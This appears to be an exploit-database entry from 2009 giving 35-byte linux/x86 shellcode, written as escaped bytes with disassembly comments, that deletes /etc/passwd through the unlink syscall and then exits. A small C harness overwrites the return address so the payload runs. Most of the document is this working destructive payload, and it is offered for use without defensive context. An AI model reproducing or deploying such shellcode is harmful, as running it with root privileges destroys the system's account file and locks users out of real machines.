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linux/x86 unlink(/etc/passwd) & exit() 35 bytes

🗓️ 24 Dec 2009 00:00:00Reported by sandmanType 
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linux/x86 unlink(/etc/passwd) & exit() 35 bytes sandman Fedora 1

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linux/x86 unlink(/etc/passwd) & exit() 35 bytes
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# Title: linux/x86 unlink(/etc/passwd) & exit() 35 bytes
# Date: 2009-12-24
# Author: sandman
# Tested on: linux/Fedora 12
# Code :
 
/*
    unlink_passwd.c
    Platform: linux/x86
    Size: 35 bytes
    Author: $andman
*/
 
#include <string.h>
#include <stdio.h>
char shell[] =  "\xeb\x11"                     //jmp    8048073
                     "\x5e"                           //pop    %esi
                     "\x31\xc0"                     //xor    %eax,%eax
                     "\x31\xc9"                     //xor    %ecx,%ecx
                     "\x31\xd2"                     //xor    %edx,%edx
                     "\xb0\x0a"                    //mov    $0xa,%al
                     "\x89\xf3"                     //mov    %esi,%ebx
                     "\xcd\x80"                    //int    $0x80
                     "\xb0\x01"                    //mov    $0x1,%al
                     "\xcd\x80"                    //int    $0x80
                     "\xe8\xea\xff\xff\xff"      //call    8048062
                     "\x2f"                           //das
                     "\x65"                          //gs
                     "\x74\x63"                    //je    80480df
                     "\x2f"                           //das
                     "\x70\x61"                    //jo    80480e0
                     "\x73\x73"                    //jae    80480f4
                     "\x77\x64";                   //ja    80480e7
int main()
{
  printf("Shellcode Length: %d\n",strlen(shell));
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shell;
}
 
//#$





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